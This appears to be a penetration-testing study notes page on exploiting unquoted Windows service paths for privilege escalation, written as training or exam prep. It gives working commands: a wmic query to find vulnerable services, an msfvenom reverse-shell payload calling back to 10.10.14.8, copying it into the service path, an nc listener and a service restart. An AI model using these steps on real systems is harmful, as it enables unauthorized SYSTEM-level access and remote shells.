// notes/ PrivEsc — Windows
🪟
Service Permissions Unquoted Service Paths
Unquotes service paths is similar to[ binary path exploitation](/windows-privilege-escalation/service-permissions/binary-paths.md), however the vulnerability lays in the fact that…
#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/service-permissions_unquoted-service-paths ↗Unquoted Service Paths
Overview
Unquotes service paths is similar to binary path exploitation, however the vulnerability lays in the fact that the path to the executable is unquoted.
When the service is started Windows looks through every word in the path separated with a space and test .exe
- C:\Program.exe - NO
- C:\Program Files.exe - NO
- C:\Program Files\Unquoted.exe - NO
- C:\Program Files\Unquoted Path.exe - NO
And so on...
Manual Exploitation
code
01wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """code
01sc.exe qc iobitunsvrExploitation via PowerUp
Run PowerUp and search for Unquoted Service Paths section
<figure><img src="/files/ivCVAhU2peQyfOjhMtNc" alt=""><figcaption><p>TCM Windows Priv Esc Try Hack Me</p></figcaption></figure>Create and drop a malicious executable
bash
$msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.execode
01copy C:\temp\Common.exe C:\Program Files\Unquoted Path Service\Common.exeStart a listener and the service
bash
$nc -lnvp 1337code
01sc.exe start unquotedsvc